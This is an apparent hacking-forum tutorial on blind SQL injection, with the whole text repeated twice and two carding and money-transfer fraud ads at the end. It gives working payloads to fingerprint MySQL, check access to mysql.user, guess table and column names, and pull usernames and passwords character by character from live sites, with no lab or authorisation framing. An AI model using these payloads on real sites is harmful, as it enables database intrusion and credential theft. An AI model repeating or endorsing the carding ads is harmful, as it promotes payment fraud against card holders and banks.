-----ABOUT BLIND SQL INJECTION------
BLIND SQL INJECTION
We have already posted about Error based sql injection. Let us the
discuss the harder part i.e. Blind sql injection.
Let our example be :
Let’s test it:
and 1=1 <--- this is always true and the
page loads normally, that's ok.
and 1=2 <--- this is false, so if some
text, picture or some content is missing on returned page then that site is
vulnerable to blind sql injection.
GETTING MySQL VERSION
To get the MySQL version in blind attack we use substring:
and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5,
and if query return TRUE then the version is 5.
CHECKING FOR SUBSELECT
When select doesn't work then we use subselect:
and (select 1)=1
If page loads normally then subselect work, then we are going to see if we
have access to mysql.user:
and (select 1 from mysql.user limit 0,1)=1
If page loads normally we have access to mysql.user and then later we can
pull some password using load_file() function and OUTFILE.
CHECKING FOR TABLE AND COLUMN NAME
Here luck and guessing works more than anything
and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns
only 1 row, this is very important.)
Then if the page loads normally without content missing, the table users
exits. If you get FALSE (some article missing), just change table name until
you guess the right one.
Let’s say that we have found that table name is users, now what we need is
column name. The same as table name, we start guessing. Like i said before
try the common names for columns:
and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that column name is password
(if we get false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1)
PULL DATA FROM DATABASE
We found table users columns username password so we gonna pull
characters from that. Like:
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
Ok this here pulls the first character from first user in table users. Substring
here returns first character and 1 character in length. ascii() converts that 1
character into ascii value and then compare it with symbol greater then > .So
if the ascii char greater then 80, the page loads normally. (TRUE) we keep
trying until we get false.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using the ascii converter we
know that char(99) is letter 'c'.
So keep incrementing until you get the end.
but trying to find the stable webpage is the tuff job
BLIND SQL INJECTION
We have already posted about Error based sql injection. Let us the
discuss the harder part i.e. Blind sql injection.
Let our example be :
Let’s test it:
and 1=1 <--- this is always true and the
page loads normally, that's ok.
and 1=2 <--- this is false, so if some
text, picture or some content is missing on returned page then that site is
vulnerable to blind sql injection.
GETTING MySQL VERSION
To get the MySQL version in blind attack we use substring:
and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5,
and if query return TRUE then the version is 5.
CHECKING FOR SUBSELECT
When select doesn't work then we use subselect:
and (select 1)=1
If page loads normally then subselect work, then we are going to see if we
have access to mysql.user:
and (select 1 from mysql.user limit 0,1)=1
If page loads normally we have access to mysql.user and then later we can
pull some password using load_file() function and OUTFILE.
CHECKING FOR TABLE AND COLUMN NAME
Here luck and guessing works more than anything
and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns
only 1 row, this is very important.)
Then if the page loads normally without content missing, the table users
exits. If you get FALSE (some article missing), just change table name until
you guess the right one.
Let’s say that we have found that table name is users, now what we need is
column name. The same as table name, we start guessing. Like i said before
try the common names for columns:
and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that column name is password
(if we get false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1)
PULL DATA FROM DATABASE
We found table users columns username password so we gonna pull
characters from that. Like:
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
Ok this here pulls the first character from first user in table users. Substring
here returns first character and 1 character in length. ascii() converts that 1
character into ascii value and then compare it with symbol greater then > .So
if the ascii char greater then 80, the page loads normally. (TRUE) we keep
trying until we get false.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using the ascii converter we
know that char(99) is letter 'c'.
So keep incrementing until you get the end.
but trying to find the stable webpage is the tuff job
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding